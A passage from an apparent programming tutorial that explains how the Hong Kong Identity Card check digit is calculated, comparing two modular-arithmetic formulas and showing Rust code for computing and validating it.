mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">9</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> <p>If we focus on the last digit (the check digit), the formula can be rearranged as:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">S+(11−10)x10=S+1⋅x10 S + (11-10)x_{10} = S + 1 \cdot x_{10} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord mathnormal">S</span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord">11</span><span class="mspace"></span><span class="mbin">−</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">10</span><span class="mclose">)</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">=</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">S</span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">1</span><span class="mspace"></span><span class="mbin">⋅</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span></span></span></span></span> </div> <p>which simplifies to:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">S+x10≡0(mod11) S + x_{10} \equiv 0 \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord mathnormal">S</span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> <p>where (S) is the weighted sum of the first nine digits.</p> <p>This means that when you add the weighted sum (S) of the first nine digits to the check digit 𝑥10​ , the result must be a multiple of 11.</p> <p> <br> <strong>Deriving the Check Digit Formula Using Modular Arithmetic</strong></p> <p>Step-by-step conversion:</p> <ol> <li> <p>Rearrange for the check digit:<br> </p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">S+x10≡0(mod11) S + x_{10} \equiv 0 \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord mathnormal">S</span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">x10≡−S(mod11) x_{10} \equiv -S \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">−</span><span class="mord mathnormal">S</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> </li> <li> <p>Express -S (mod 11) as a positive remainder:<br> In modular arithmetic, a negative remainder can be rewritten as:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">−S(mod11)=(11−(S mod 11)) mod 11 -S \pmod{11} = (11 - (S \bmod{11})) \bmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord">−</span><span class="mord mathnormal">S</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span><span class="mspace"></span><span class="mrel">=</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord">11</span><span class="mspace"></span><span class="mbin">−</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord mathnormal">S</span><span class="mspace"></span><span class="mspace"></span><span class="mbin"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord">11</span></span><span class="mclose">))</span><span class="mspace"></span><span class="mspace"></span><span class="mbin"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord">11</span></span></span></span></span></span> </div> <p>This is because adding the modulus (11) to a negative number brings it back into the range of 0…10.</p> </li> <li> <p>Substitute and simplify:<br></p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">x10=(11−(S mod 11)) mod 11 x_{10} = (11 - (S \bmod{11})) \bmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">=</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord">11</span><span class="mspace"></span><span class="mbin">−</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord mathnormal">S</span><span class="mspace"></span><span class="mspace"></span><span class="mbin"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord">11</span></span><span class="mclose">))</span><span class="mspace"></span><span class="mspace"></span><span class="mbin"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord">11</span></span></span></span></span></span> </div> </li> </ol> <p> <br> <strong>Summary</strong></p> <ul> <li>S + x10 ≡ 0 (mod 11) leads to x10 ≡ -S (mod 11).</li> <li>In computer code, to always get a non-negative remainder, we use (11 - (S mod 11)) mod 11.</li> <li>Therefore, the check digit formula becomes (11 - (sum % 11)) % 11.</li> </ul> <h2> 4. (Optional) Comparing Online HKID Check Digit Formulas: Common Practices vs. the ISBN-10 Method </h2> <p> </p> <h3> 4.1 Common Practices </h3> <p>The majority of online resources present the HKID check digit calculation formula as <code>11 - (sum % 11)</code>, typically without providing any underlying rationale. However, this approach can yield results ranging from 0 to 10, while the check digit field permits only a single digit or, in some cases, the character 'A'. Therefore, additional logic is required to map the result to a valid check digit. This mapping can be expressed as follows:</p> <ul> <li>If the result is 0, the check digit is <code>'0'</code>.</li> <li>If the result is 1, the check digit is <code>'A'</code>.</li> <li>If the result is between 2 and 10, the check digit is the corresponding digit: <code>11 - (sum % 11)</code>.</li> </ul> <p>Formally, this can be written as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">remainder</span> <span class="o">=</span> <span class="n">sum</span> <span class="o">%</span> <span class="mi">11</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">remainder</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">check_digit</span> <span class="o">=</span> <span class="sc">'0'</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">remainder</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">check_digit</span> <span class="o">=</span> <span class="sc">'A'</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">check_digit</span> <span class="o">=</span> <span class="mi">11</span> <span class="o">-</span> <span class="n">remainder</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>As a result, many implementations use conditional statements to handle these cases, increasing the complexity of the logic.</p> <p> </p> <h3> 4.2 The ISBN-10 Method </h3> <p>The ISBN-10 method applies the formula <code>(11 - (sum % 11)) % 11</code> for HKID check digit calculation. This approach is structurally similar to the commonly used method, but it incorporates an additional modulo operation at the final step.</p> <p>The purpose of this extra <code>% 11</code> is to ensure that when <code>sum % 11</code> equals 0, the calculation yields a check digit of 0, rather than 11. This guarantees that all possible results are valid single-digit values (0–10) and removes the need for separate handling of results outside this range.</p> <p>Based on the output, only the value <code>10</code> needs to be mapped to <code>'A'</code>, while all other digits can be used directly as the check digit. This mapping makes the implementation simpler and easier to understand.</p> <p>A typical implementation can be represented as follows:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">check_digit</span> <span class="o">=</span> <span class="p">(</span><span class="mi">11</span> <span class="o">-</span> <span class="n">sum</span> <span class="o">%</span> <span class="mi">11</span><span class="p">)</span> <span class="o">%</span> <span class="mi">11</span><span class="p">;</span> <span class="k">match</span> <span class="n">check_digit</span> <span class="p">{</span> <span class="mi">10</span> <span class="k">=&gt;</span> <span class="nf">Some</span><span class="p">(</span><span class="sc">'A'</span><span class="p">),</span> <span class="n">digit</span> <span class="k">=&gt;</span> <span class="nn">char</span><span class="p">::</span><span class="nf">from_digit</span><span class="p">(</span><span class="n">digit</span><span class="p">,</span> <span class="mi">10</span><span class="p">),</span> <span class="p">}</span> </code></pre> </div> <p> </p> <h3> 4.3 Why the Common Practices and the ISBN-10 Method Return the Same Result </h3> <p>Both the Common Practices <code>11 - (sum % 11)</code> and the ISBN-10 Method <code>(11 - (sum % 11)) % 11</code> are used for check digit calculation. Although the formulas differ slightly, they produce the same result when the proper mapping is applied. The process can be described as follows:</p> <ol> <li><p>Calculate the Remainder<br> Both methods start by calculating the remainder:<br> <code>remainder = sum % 11</code></p></li> <li><p>Subtract from 11<br> The next step is to subtract the remainder from 11:<br> <code>check_digit = 11 - remainder</code><br> This yields results ranging from 1 to 11.</p></li> <li> <p>Result Mapping in Common Practices<br> According to the Common Practices approach, the mapping is as follows:</p> <ul> <li>If <code>remainder</code> is 0, then <code>check_digit</code> is <code>'0'</code> </li> <li>If <code>remainder</code> is 1, then <code>check_digit</code> is <code>'A'</code> </li> <li>If <code>remainder</code> is between 2 and 10, then <code>check_digit</code> is <code>11 - remainder</code> (i.e., a digit from 9 to 1) </li> </ul> </li> <li> <p>Result Mapping in the ISBN-10 Method <br> The ISBN-10 method applies an additional modulo operation:<br> <code>check_digit = (11 - (sum % 11)) % 11</code><br> The mapping is:</p> <ul> <li>If <code>check_digit</code> is 10, return <code>'A'</code> </li> <li>Otherwise, return the digit itself (<code>0</code> to <code>9</code>)</li> </ul> </li> <li> <p>Equivalence of Both Methods <br> Both methods ensure the check digit is:</p> <ul> <li> <code>'0'</code> when the remainder is 0 (resulting in 11, mapped to 0 by ISBN-10 method's <code>% 11</code>)</li> <li> <code>'A'</code> when the remainder is 1 (resulting in 10)</li> <li>Digits <code>1</code> to <code>9</code> for other remainders</li> </ul> <p>The only difference is that the Common Practices approach uses explicit conditional mapping, while the ISBN-10 method uses a modulo operation to automatically handle the special case when the result is 11.</p> </li> </ol> <p> <br> Example: Result Comparison</p> <p>The table below demonstrates that both methods produce the same check digits for a variety of weighted sum values:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Weighted Sum (<code>sum</code>)</th> <th>sum % 11</th> <th>Common Practices Result</th> <th>ISBN-10 <code>(11 - sum % 11) % 11</code> </th> <th>Final Check Digit</th> </tr> </thead> <tbody> <tr> <td>113</td> <td>3</td> <td>else → 8</td> <td>(11-3)%11 = 8</td> <td>8</td> </tr> <tr> <td>245</td> <td>3</td> <td>else → 8</td> <td>(11-3)%11 = 8</td> <td>8</td> </tr> <tr> <td>311</td> <td>3</td> <td>else → 8</td> <td>(11-3)%11 = 8</td> <td>8</td> </tr> <tr> <td>402</td> <td>6</td> <td>else → 5</td> <td>(11-6)%11 = 5</td> <td>5</td> </tr> <tr> <td>156</td> <td>2</td> <td>else → 9</td> <td>(11-2)%11 = 9</td> <td>9</td> </tr> <tr> <td>230</td> <td>10</td> <td>else → 1</td> <td>(11-10)%11 = 1</td> <td>1</td> </tr> <tr> <td>407</td> <td>0</td> <td>if 0 → '0'</td> <td>(11-0)%11 = 0</td> <td>0</td> </tr> <tr> <td>372</td> <td>9</td> <td>else → 2</td> <td>(11-9)%11 = 2</td> <td>2</td> </tr> <tr> <td>454</td> <td>3</td> <td>else → 8</td> <td>(11-3)%11 = 8</td> <td>8</td> </tr> <tr> <td>187</td> <td>0</td> <td>if 0 → '0'</td> <td>(11-0)%11 = 0</td> <td>0</td> </tr> </tbody> </table></div> <p>As shown, the check digit results from both the Common Practices and ISBN-10 Method are always the same.</p> <p> <br> Conclusion:</p> <p>When the special mappings are correctly applied, both the Common Practices and the ISBN-10 Method yield identical check digit results for any valid HKID number.</p> <h2> 5. Alphabet-to-Number Mapping </h2> <p> <br> For reference, here’s how letters are converted to numbers in the HKID algorithm:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Letter</th> <th>Value</th> <th>Letter</th> <th>Value</th> <th>Letter</th> <th>Value</th> <th>Letter</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>A</td> <td>10</td> <td>B</td> <td>11</td> <td>C</td> <td>12</td> <td>D</td> <td>13</td> </tr> <tr> <td>E</td> <td>14</td> <td>F</td> <td>15</td> <td>G</td> <td>16</td> <td>H</td> <td>17</td> </tr> <tr> <td>I</td> <td>18</td> <td>J</td> <td>19</td> <td>K</td> <td>20</td> <td>L</td> <td>21</td> </tr> <tr> <td>M</td> <td>22</td> <td>N</td> <td>23</td> <td>O</td> <td>24</td> <td>P</td> <td>25</td> </tr> <tr> <td>Q</td> <td>26</td> <td>R</td> <td>27</td> <td>S</td> <td>28</td> <td>T</td> <td>29</td> </tr> <tr> <td>U</td> <td>30</td> <td>V</td> <td>31</td> <td>W</td> <td>32</td> <td>X</td> <td>33</td> </tr> <tr> <td>Y</td> <td>34</td> <td>Z</td> <td>35</td> <td>[</td> <td>36</td> <td></td> <td></td> </tr> </tbody> </table></div> <p> </p> <h3> Why Alphabet-to-Number Mapping is Needed </h3> <p> <br> In the HKID check digit calculation, each character in the card number, whether it is a letter, number, or a space, must be converted to a numeric value before performing calculations. This process is called <strong>alphabet-to-number mapping</strong>.</p> <p> <br> The HKID number typically starts with one or two letters (the prefix), followed by six digits and a check digit in parentheses. To calculate or verify the check digit, the HKID algorithm multiplies each character by a <code>position-based weight</code> and <code>sums the results</code>. <u>Since mathematical operations can only be performed on numbers, any letter in the HKID must first be converted to its corresponding numeric value.</u></p> <ul> <li>Letters are mapped from A = 10 up to Z = 35.</li> <li>A space (used for padding single-letter prefixes) is mapped to 36.</li> <li>Digits keep their natural values (0–9).</li> </ul> <h2> 6. HKID Check Digit Calculation: Step-by-Step Explanation </h2> <p> <br> Let’s formally get started with today’s topic. In the following section, we’ll break down the HKID check digit calculation step by step so you can easily understand the process.</p> <p> <br> The HKID check digit helps verify the validity of an HKID number. The calculation has two parts:</p> <ul> <li>First: Compute a weighted sum.</li> <li>Second: Apply a modulus formula to get the check digit.</li> </ul> <p> </p> <h3> Step 1: Calculate the Weighted Sum </h3> <ol> <li>Pad the HKID if needed: <ul> <li>If the prefix is a single letter (e.g., <code>A123456</code>), pad it by adding a space in front: <ul> <li><code>"[A123456"</code></li> </ul> </li> <li>If the prefix is two letters (e.g., <code>AZ123456</code>), use as-is.</li> </ul> </li> <li>Convert each character to a number: <ul> <li>For letters: <code>A = 10</code>, <code>B = 11</code>, ..., <code>Z = 35</code> </li> <li>For digits: use the digit itself</li> <li>For a [: <code>36</code> </li> </ul> </li> <li>Apply positional weights: <ul> <li>The weights, from left to right, are: 9, 8, 7, 6, 5, 4, 3, 2</li> </ul> </li> <li>Calculate the weighted sum: <ul> <li>Multiply each character’s numeric value by its corresponding weight and sum the results.</li> </ul> </li> </ol> <p> </p> <h3> Worked Example </h3> <p>Suppose the HKID is <code>A123456</code>:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Character</th> <th>Value</th> <th>Weight</th> <th>Sum</th> </tr> </thead> <tbody> <tr> <td>[</td> <td>36</td> <td>9</td> <td>324</td> </tr> <tr> <td>A</td> <td>10</td> <td>8</td> <td>80</td> </tr> <tr> <td>1</td> <td>1</td> <td>7</td> <td>7</td> </tr> <tr> <td>2</td> <td>2</td> <td>6</td> <td>12</td> </tr> <tr> <td>3</td> <td>3</td> <td>5</td> <td>15</td> </tr> <tr> <td>4</td> <td>4</td> <td>4</td> <td>16</td> </tr> <tr> <td>5</td> <td>5</td> <td>3</td> <td>15</td> </tr> <tr> <td>6</td> <td>6</td> <td>2</td> <td>12</td> </tr> </tbody> </table></div> <p> </p> <h4> Weighted sum: </h4> <p>324 + 80 + 7 + 12 + 15 + 16 + 15 + 12 = <strong>481</strong></p> <p> <br> Code implementation (Rust):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">const</span> <span class="n">WEIGHTS</span><span class="p">:</span> <span class="p">[</span><span class="nb">u32</span><span class="p">;</span> <span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="mi">9</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">];</span> <span class="k">let</span> <span class="n">values</span> <span class="o">=</span> <span class="n">padded_body</span><span class="nf">.chars</span><span class="p">()</span><span class="nf">.map</span><span class="p">(</span><span class="k">Self</span><span class="p">::</span><span class="n">char_to_value</span><span class="p">)</span><span class="py">.collect</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">Option</span><span class="o">&lt;</span><span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u32</span><span class="o">&gt;&gt;&gt;</span><span class="p">()</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">sum</span> <span class="o">=</span> <span class="n">values</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.zip</span><span class="p">(</span><span class="n">WEIGHTS</span><span class="nf">.iter</span><span class="p">())</span><span class="nf">.map</span><span class="p">(|(</span><span class="n">v</span><span class="p">,</span> <span class="n">w</span><span class="p">)|</span> <span class="n">v</span> <span class="o">*</span> <span class="n">w</span><span class="p">)</span><span class="py">.sum</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">u32</span><span class="o">&gt;</span><span class="p">();</span> </code></pre> </div> <p> </p> <h3> Step 2: Calculate the Check Digit </h3> <p>Use the weighted sum from Step 1 in ISBN-10 check digit formula:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="n">check_digit</span> <span class="o">=</span> <span class="p">(</span><span class="mi">11</span> <span class="o">-</span> <span class="p">(</span><span class="n">sum</span> <span class="o">%</span> <span class="mi">11</span><span class="p">))</span> <span class="o">%</span> <span class="mi">11</span> </code></pre> </div> <ul> <li>If the result is 10, the check digit is <code>A</code> </li> <li>If the result is 0, the check digit is <code>0</code> </li> <li>Otherwise, the check digit is the digit itself</li> </ul> <p> <br> Code implementation (Rust):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">match</span> <span class="n">check_digit</span> <span class="p">{</span> <span class="mi">10</span> <span class="k">=&gt;</span> <span class="sc">'A'</span><span class="p">,</span> <span class="n">digit</span> <span class="k">=&gt;</span> <span class="nn">char</span><span class="p">::</span><span class="nf">from_digit</span><span class="p">(</span><span class="n">check_digit</span><span class="p">,</span> <span class="mi">10</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">(),</span> <span class="p">}</span> </code></pre> </div> <p> </p> <h3> Continuing the Example </h3> <ul> <li>Weighted sum: <strong>481</strong> </li> <li><code>sum % 11 = 481 % 11 = 8</code></li> <li><code>11 - 8 = 3</code></li> <li><code>3 % 11 = 3</code></li> </ul> <p>So, the check digit is <strong>3</strong> (the complete HKID is <code>A123456(3)</code>).</p> <p> </p> <h3> Core Logic Implementation (Rust) </h3> <p>The following is the core logic used to calculate the HKID check digit. For full details functions, please visit my GitHub repo: <a href="https://github.com/iam-samleung/hkid_ops/tree/master/rust_hkid_ops" rel="noopener noreferrer">hkid_ops/rust_hkid_ops</a>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">const</span> <span class="n">WEIGHTS</span><span class="p">:</span> <span class="p">[</span><span class="nb">u32</span><span class="p">;</span> <span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="mi">9</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">];</span> <span class="k">fn</span> <span class="nf">char_to_value</span><span class="p">(</span><span class="n">c</span><span class="p">:</span> <span class="nb">char</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="nb">u32</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="nf">.to_ascii_uppercase</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u8</span><span class="p">;</span> <span class="k">match</span> <span class="n">c</span> <span class="p">{</span> <span class="sc">b'A'</span><span class="o">..=</span><span class="sc">b'Z'</span> <span class="k">=&gt;</span> <span class="nf">Some</span><span class="p">(</span><span class="nn">u32</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="n">c</span> <span class="o">-</span> <span class="sc">b'A'</span> <span class="o">+</span> <span class="mi">10</span><span class="p">)),</span> <span class="sc">b'0'</span><span class="o">..=</span><span class="sc">b'9'</span> <span class="k">=&gt;</span> <span class="nf">Some</span><span class="p">(</span><span class="nn">u32</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="n">c</span> <span class="o">-</span> <span class="sc">b'0'</span><span class="p">)),</span> <span class="sc">b' '</span> <span class="k">=&gt;</span> <span class="nf">Some</span><span class="p">(</span><span class="mi">36</span><span class="p">),</span> <span class="n">_</span> <span class="k">=&gt;</span> <span class="nb">None</span><span class="p">,</span> <span class="p">}</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">calculate_check_digit</span><span class="p">(</span><span class="o">&amp;</span><span class="k">self</span><span class="p">,</span> <span class="n">hkid_body</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="nb">char</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">if</span> <span class="o">!</span><span class="n">VALID_HKID_BODY_REGEX</span><span class="nf">.is_match</span><span class="p">(</span><span class="n">hkid_body</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">None</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">padded_body</span> <span class="o">=</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"{hkid_body:&gt;8}"</span><span class="p">);</span> <span class="k">let</span> <span class="n">values</span> <span class="o">=</span> <span class="n">padded_body</span><span class="nf">.chars</span><span class="p">()</span><span class="nf">.map</span><span class="p">(</span><span class="nn">HKIDOps</span><span class="p">::</span><span class="n">char_to_value</span><span class="p">)</span><span class="py">.collect</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">Option</span><span class="o">&lt;</span><span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u32</span><span class="o">&gt;&gt;&gt;</span><span class="p">()</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">sum</span> <span class="o">=</span> <span class="n">values</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.zip</span><span class="p">(</span><span class="n">WEIGHTS</span><span class="nf">.iter</span><span class="p">())</span><span class="nf">.map</span><span class="p">(|(</span><span class="n">v</span><span class="p">,</span> <span class="n">w</span><span class="p">)|</span> <span class="n">v</span> <span class="o">*</span> <span class="n">w</span><span class="p">)</span><span class="py">.sum</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">u32</span><span class="o">&gt;</span><span class="p">();</span> <span class="k">let</span> <span class="n">check_digit</span> <span class="o">=</span> <span class="p">(</span><span class="mi">11</span> <span class="o">-</span> <span class="n">sum</span> <span class="o">%</span> <span class="mi">11</span><span class="p">)</span> <span class="o">%</span> <span class="mi">11</span><span class="p">;</span> <span class="k">match</span> <span class="n">check_digit</span> <span class="p">{</span> <span class="mi">10</span> <span class="k">=&gt;</span> <span class="nf">Some</span><span class="p">(</span><span class="sc">'A'</span><span class="p">),</span> <span class="n">digit</span> <span class="k">=&gt;</span> <span class="nn">char</span><span class="p">::</span><span class="nf">from_digit</span><span class="p">(</span><span class="n">digit</span><span class="p">,</span> <span class="mi">10</span><span class="p">),</span> <span class="p">}</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">validate_hkid</span><span class="p">(</span><span class="o">&amp;</span><span class="k">self</span><span class="p">,</span> <span class="n">hkid_full</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">,</span> <span class="n">must_exist_in_enum</span><span class="p">:</span> <span class="nb">bool</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">bool</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">cleaned</span> <span class="o">=</span> <span class="n">hkid_full</span><span class="nf">.chars</span><span class="p">()</span> <span class="nf">.filter</span><span class="p">(|</span><span class="o">&amp;</span><span class="n">c</span><span class="p">|</span> <span class="n">c</span> <span class="o">!=</span> <span class="sc">'('</span> <span class="o">&amp;&amp;</span> <span class="n">c</span> <span class="o">!=</span> <span class="sc">')'</span><span class="p">)</span> <span class="py">.collect</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span><span class="p">();</span> <span class="k">let</span> <span class="n">caps</span> <span class="o">=</span> <span class="n">HKID_FULL_REGEX</span><span class="nf">.captures</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cleaned</span><span class="p">)</span> <span class="nf">.ok_or_else</span><span class="p">(||</span> <span class="s">"Invalid HKID format: incorrect structure."</span><span class="nf">.to_string</span><span class="p">())</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">prefix</span> <span class="o">=</span> <span class="n">caps</span><span class="nf">.get</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="nf">.ok_or</span><span 